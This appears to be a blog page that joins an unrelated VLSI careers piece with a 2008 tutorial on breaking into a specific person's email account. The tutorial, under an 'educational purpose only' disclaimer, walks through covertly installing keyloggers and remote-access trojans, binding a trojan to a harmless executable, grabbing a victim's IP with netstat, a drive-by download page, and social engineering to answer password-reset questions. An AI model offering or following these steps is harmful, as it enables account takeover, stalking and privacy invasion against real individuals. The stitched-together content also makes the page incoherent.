WHO CAN ENTER THIS FIELD AND HOW?

Those of us, who are already enjoying the brainteasers in designing and testing The Chips, find it very rewarding. Not just from intellectual point of view but also from the "pocket" point of view. When these two views converge, it creates an engineer's paradise. Who wouldn't like best of both worlds? With all the innovation and rapid development, this field has virtually unlimited scope to grow.

This is all fine, but it raises a million questions. To state a few; How does one get a foot in the door in this field? When do you start thinking about choosing this branch? What does it take? Where do you get the training? What sort of jobs are available and where? How much does it really pay as an engineer and what are the growth prospects for a fresh entrant? Does he choose a technical career path or a management path? This is an attempt to guide you on the right path when you are about make an important choice in your career. The idea is to give you a flavor of what to look for, and not to intimidate you with technical jargon (not yet anyway!) and information overload.

First of all, let's make it clear that it is not mandatory to have a BE in Electronics to work in this field. It certainly is the obvious degree to earn, but quality graduate and post-graduate degree in Physics also qualifies one to work as an engineer. The Physics of Semiconductor Devices is the fundamental basis of VLSI. We will see how the choice of various curricula shapes up the job scene, but for now, let's concentrate on the initials.

AFTER ALL THIS EDUCATION AND YEARS OF HARD WORK, IS THE MONEY WORTH IT?  Well, that really is a matter of personal choice. For those who want to be ambitious engineers, let us level the field of expectations! A fresh college graduate with professional course in VLSI Design entering the VLSI field can expect a starting salary in the range of $45,000 to $55,000 per year. In India, the range is Rs. 2.4 lakhs upwards per year depending on the company, the need and the skill level demonstrated. Design engineers are the most sought after because of the industry's emphasis on continuous new product development, miniaturization and innovation in integration. Typically, a graduate with a Master's degree can expect about 10% higher than the one with a Bachelor's and someone with a Ph.D. can expect a wide range. As you gain the experience, this field offers one of the best growths potential, both on the technical as well as management ladder. Salary surveys can be found on-line at www.ieee.org

 

WHAT ARE THE TYPICAL COMPANIES I CAN SEARCH FOR ON THE WEB TO GET MORE INFORMATION ON VLSI TECHNOLOGY AND JOBS? 

Intel, IBM, Texas Instruments, Motorola, National Semiconductor, Maxim, Linear Technology, Siemens, Qualcomm and CG-CoreEL are some of the names just to mention a few. All have impressive websites and loads of information

Monday, October 20, 2008

HACKING TECHNIQUES

HOW TO BREAK EMAIL ACCOUNTS

WARNING:

I do not endorse Hacking !
This is meant for educational purpose only !
I want u to know how others can try break into your Personal life !
Beware !!

This is a Genuine Article.

Will try to add in as much as possible
keep posting !
comment on this article !


INTRODUCTION:


I have written this tutorial to address a question that is all too commonly asked in any channel/chat room with "hack" in the title (asked in frequency to the point of harrassment really). So since this is a question that so many people ask, then I believe that there should at least be an answer available (regardless of the morality or "lameness" of such a question). So you as the reader are most likely reading this because you want to break into somebody's email account.



Well, you must understand that there is no 
1-2-3 process to anything. I will give you options to consider when persuing such a task, but it will ultimately be up to you to do this. This is what you want to do, and no matter what sort of offers you throw up at anybody, nobody is going to do this for you. There is no program that is going to do all this for you. Also don't forget that nobody is going to hold your hand and lead you through this. I'm offering you as the reader suggestions for ways you can address this task, and that is about all the help you are going to get from anybody. So now that I've made all that clear, let's begin...

Things You Should Know

 

As I mentioned in the previous section, there is no program that will do all this for you. Almost all the crackers you see out there will not work, because services like Hotmail, Yahoo!, etc. have it set so that it will lock you from that account after a certain number of login attempts. There are some rare exceptions, like some crackers for Yahoo! that are made for cracking "illegal" accounts, but the thing you must understand about those types of crackers is that they are built to crack SPECIFICALLY "illegal" names. They can not be used to target a specific account on Yahoo!, so don't try to use them for this purpose. Another thing you must know if you ask this question in any "hacker" chat room/channel (which I highly discourage), or if you read something on this topic, and you hear that you have to email some address and in any way have to give up your password in the process, do NOT believe this. This is a con used to trick gullible people into handing over their passwords. So don't fall for this. Well that concludes this section, now lets get to what you want to know.

If You Have Physical Access

I will start off with options you have if you have physical access to the computer of the user that you are targeting, because it is a lot easier if you do. One option you have, that you will hear a lot if you ask this question, and anybody bothers to answer is to use a keylogger. A keylogger is an excellent option, and probably the easiest. There are a lot of keyloggers out there, ranging from hardware keyloggers, to software keyloggers. For this task, you won't need to buy a hardware keylogger, since the only advantage to a hardware one is that you can grab passwords that are given to access a certain local user on the operating system used. There are a lot of software keyloggers out there, and you can feel free to check out 
www.google.com to look at your options. I will go ahead and toss a couple of keyloggers out to try for those of you who seem allergic to search engines.


One option you have that is good for a free keylogger is Perfect Keylogger (which you can find at
www.blazingtools.com/bpk.html). It works just fine, and has some nice options to keep it hidden from your average end user (computer user).


Another option you have, which is probably the best one you can get is Ghost Keylogger. It has a lot of options that will allow you to get the results of this program remotely (it will email you the results). However, this is not a free keylogger, so if you are wanting to get a copy you can look on the file sharing networks for a copy of the program, and the serial number for it (look on 
www.zeropaid.com for different file sharing clients you can try).

Once you have whatever keylogger you are going to use downloaded, just install it onto the computer you are wanting to monitor, and wait till next time they login to their email account. You will then have the password for the account. Another option you have if they use Outlook to access their email account, is to copy the *.dbx files for their Outlook account onto a floppy, and extract the emails at home (the dbx file stores the files stored in each Outlook folder on a given account, meaning the received and sent emails). When you are on the computer of the user you are targeting, look in

C:\Windows\ApplicationData\Identities\{ACblahblahblah}\Microsoft\ OutlookExpress\ and copy all the .dbx files onto a floppy. Then when you take the .dbx files back to your house, use DBXtract to extract the messages from these files. Check out the link below to download this program....



www.download-freeware-shareware.com/Freeware-Internet.php?Type=4171


 

Another option you have if you have physical access is to execute a RAT (Remote Administration Tool, you may know these programs as trojans) server on the computer. Of course, you do not have to have physical access to go this route, but it helps. What you must understand is that these tools are known threats, and the popular ones are quickly detected by antivirus software, and thusly taken care of. Even ISPs block incoming/outgoing traffic from the most popular ports used by these programs.


One newcomer in the RAT market that you should know about is Project Leviathan. This program uses already existing services to host it's service, instead of opening up an entirely new port. This allows it to hide itself from any port detection tool/software firewall that may be in place. This of course will not guarantee that it's server program will not be detected by any antivirus software used (actually, if the user has kept up with his/her signature tables, then it WILL be detected), but it will give you more of a chance of holding access. Search the engines to download Project Leviathan...




Once you have downloaded this tool, follow the instructions listed to install and use this program. However, since this RAT is a command line tool, you will still need another program set up on the user's computer in order to catch the desired password. For this, you can use Password Logger.. Google it




Once you have this downloaded, set it up on the targeted computer. The program will remain hidden, while logging any types of passwords into a .lst file in the same directory that you executed it on. Therefore, you can access this *.lst file through Project Leviathan remotely in order to retrieve the user's email password remotely. Well that pretty much concludes it for this section. At this very moment I can practically hear a lot of you thinking to yourselves "But, but I don't HAVE physical access!". No reason to worry, that's what the next section is for...

If You Don't Have Physical Access

Well of course most of you out there will say that you don't have physical access to your target's computer. That's fine, there still are ways you can gain access into the desired email account without having to have any sort of physical access. For this we are going to go back onto the RAT topic, to explain methods that can be used to fool the user into running the server portion of the RAT (again, a RAT is a trojan) of your choice. Well first we will discuss the basic "send file" technique. This is simply convincing the user of the account you want to access to execute the server portion of your RAT.


To make this convincing, what you will want to do is bind the server.exe to another *.exe file in order to not raise any doubt when the program appears to do nothing when it is executed. For this you can use the tool like any exe file to bind it into another program (make it something like a small game)...



On a side note, make sure the RAT of your choice is a good choice. The program mentioned in the previous section would not be good in this case, since you do need physical access in order to set it up. You will have to find the program of your choice yourself (meaning please don't ask around for any, people consider that annoying behavior).


If you don't like any of those, I'm afraid you are going to have to go to 
www.google.com, and look for some yourself. Search for something like "optix pro download", or any specific trojan. If you look long enough, among all the virus notification/help pages, you should come across a site with a list of RATs for you to use (you are going to eventually have to learn how to navigate a search engine, you can't depend on handouts forever). Now back to the topic at hand, you will want to send this file to the specified user through an instant messaging service.
 

The reason why is that you need the ip address of the user in order to connect with the newly established server. Yahoo! Messenger, AOL Instant Messenger, it really doesn't matter. What you will do is send the file to the user. Now while this transfer is going on you will go to Start, then Run, type in "command", and press Enter. Once the msdos prompt is open, type in "netstat -n", and again, press enter. You will see a list of ip addresses from left to right. The address you will be looking for will be on the right, and the port it's established on will depend on the instant messaging service you are using. With MSN Messenger it will be remote port 6891, with AOL Instant Messenger it will be remote port 2153, with ICQ it will be remote port 1102, 2431, 2439, 2440, or 2476, and with Yahoo! Messenger it will be remote port 1614.


So once you spot the established connection with the file transfer remote port, then you will take note of the ip address associated with that port. So once the transfer is complete, and the user has executed the server portion of the RAT, then you can use the client portion to sniff out his/her password the next time he/she logs on to his/her account.


Don't think you can get him/her to accept a file from you? Can you at least get him/her to access a certain web page? Then maybe this next technique is something you should look into.


Currently Internet Explorer is quite vulnerable to an exploit that allows you to drop and execute .exe files via malicious scripting within an html document. For this what you will want to do is set up a web page, make sure to actually put something within this page so that the visitor doesn't get too entirely suspicious, and then imbed the below script into your web page so that the server portion of the RAT of your choice is dropped and executed onto the victim's computer...




While you are at it, you will also want to set up an ip logger on the web page so that you can grab the ip address of the user so that you can connect to the newly established server. Here is the source for a php ip logger you can use on your page...


http://www.planet-source-code.com/vb/scripts/ShowCode.asp?txtCodeId=539&lngWId=8


Just insert this source into your page along with the exedrop script, and you are set. Just convince the user to go to this page, and wait till the next time they type in their email password. However, what do you do if you can not contact this user in any way to do any of the above tricks. Well, then you definately have your work cut out for you. It doesn't make the task impossible, but it makes it pretty damn close to it. For this we will want to try info cracking. Info cracking is the process of trying to gather enough information on the user to go through the "Forgot my Password" page, to gain access into the email account.

If you happen to know the user personally, then it helps out a lot. You would then be able to get through the birthday/ zipcode questions with ease, and with a little mental backtracking, or social engineering (talking) out the information from the user be able to get past the secret question. However, what do you do if you do not have this luxury? Well in this case you will have to do a little detective work to fish out the information you need.

First off, if a profile is available for the user, look at the profile to see if you can get any information from the profile. Many times users will put information into their profile, that may help you with cracking the account through the "Forgot my Password" page (where they live, their age, their birthday if you are lucky). If no information is provided then what you will want to do is get on an account that the user does not know about, and try to strike conversation with the user. Just talk to him/her for a little while, and inconspicuously get this information out of the user (inconspicuously as in don't act like you are trying to put together a census, just make casual talk with the user and every once in a while ask questions like "When is your birthday?" and "Where do you live?", and then respond with simple, casual answers).


Once you have enough information to get past the first page, fill those parts out, and go to the next page to find out what the secret question is. Once you have the secret question, you will want to keep making casual conversation with the user and SLOWLY build up to asking a question that would help you answer the secret question. Don't try to get all the information you need in one night or you will look suspicious. Patience is a virtue when info cracking. Just slowly build up to this question. For example, if the secret question is something like "What is my dog's name?", then you would keep talking with the user, and eventually ask him/her "So how many dogs do you have? ...Oh, that's nice. What are their names?". The user will most likely not even remember anything about his/her secret question, so will most likely not find such a question suspicious at all (as long as you keep it inconspicuous). So there you go, with a few choice words and a little given time, you have just gotten the user to tell you everything you need to know to break into his/her email account. The problem with this method is that once you go through the "Forgot my Password" page, the password will be changed, and the new password will be given to you. This will of course deny the original user access to his/her own account. But the point of this task is to get YOU access, so it really shouldn't matter. Anyways, that concludes it for this tutorial. 

Good luck...